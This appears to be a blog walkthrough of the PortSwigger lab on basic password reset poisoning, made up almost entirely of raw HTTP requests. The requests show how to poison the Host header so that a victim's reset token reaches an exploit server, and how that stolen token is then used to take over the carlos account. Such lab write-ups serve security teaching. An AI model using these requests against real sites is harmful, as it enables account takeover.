Skip to content

chojnowski.it

Port Swigger Basic password reset poisoning

Port Swigger Basic password reset poisoning

Basic password reset poisoning¶

Solution¶

L: wiener
P: peter
mail: wiener@exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
---
POST /login HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=ogMCgfuAoVjFkdZ8nV9yNlfTYeWFeIkV; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gD1JqGBohJMFyHgiDpxS2Oniu2cWR2aU&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=8nLKZqY81EAdCcZp1viNA1TtjeGFpStz; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Change password for user wiener¶

new password: qwerty123
---
GET /forgot-password HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /forgot-password HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&username=wiener%40exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
---
GET /email HTTP/2
Host: exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /forgot-password?temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87 HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /forgot-password?temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87 HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password?temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&temp-forgot-password-token=sp1tawt6pxvs9desut8qc74ihsr9nl87&new-password-1=qwerty123&new-password-2=qwerty123

Change Host header¶

POST /forgot-password HTTP/2
Host: hacked.mypage.com
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&username=wiener%40exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net

Forgot password for user carlos¶

Change header Host and username
---
POST /forgot-password HTTP/2
Host: exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&username=carlos

Read request GET from exploit server¶

https://exploit-0a05001803bc79a681a70b5c0141009f.exploit-server.net/log
---
for user carlos
temp-forgot-password-token: c91x7oo2uw6uajaq2yxvv5fc4sy08iin
---
Request
10.0.3.121      2025-09-24 10:24:00 +0000 "GET /forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"

Sent request to change password for user carlos¶

Change temp-forgot-password-token on the token for user carlos (prev step) - c91x7oo2uw6uajaq2yxvv5fc4sy08iin

GET /forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

---
POST /forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin HTTP/2
Host: 0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Cookie: session=Fr5w7NO79EMhTr61GZGH7PIPk4T7BOGh; _lab=46%7cMCwCFHMMoTkJzhS5P7VcYY9P11Z%2fbQdQAhQUK7nj3MG9alg%2b4kWapE9fLR40ttJJ4FowHn%2b%2faTIJzsEIB%2bLfuBGxC1XG4mzu7G5D9QQ84ATvm24CZbty5VAqepAKUFlcSDKf8UfijHAJaGutZOtxvj0XSzZt9qt3%2fwVAPrE9aMQzJJc%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net
Referer: https://0ad0007c03bc79a281ad0c3f00ac00cc.web-security-academy.net/forgot-password?temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gh8Ap1yv3uBILuSdhvjmdn7h9RtANpGR&temp-forgot-password-token=c91x7oo2uw6uajaq2yxvv5fc4sy08iin&new-password-1=Qwerty123&new-password-2=Qwerty123

Solved¶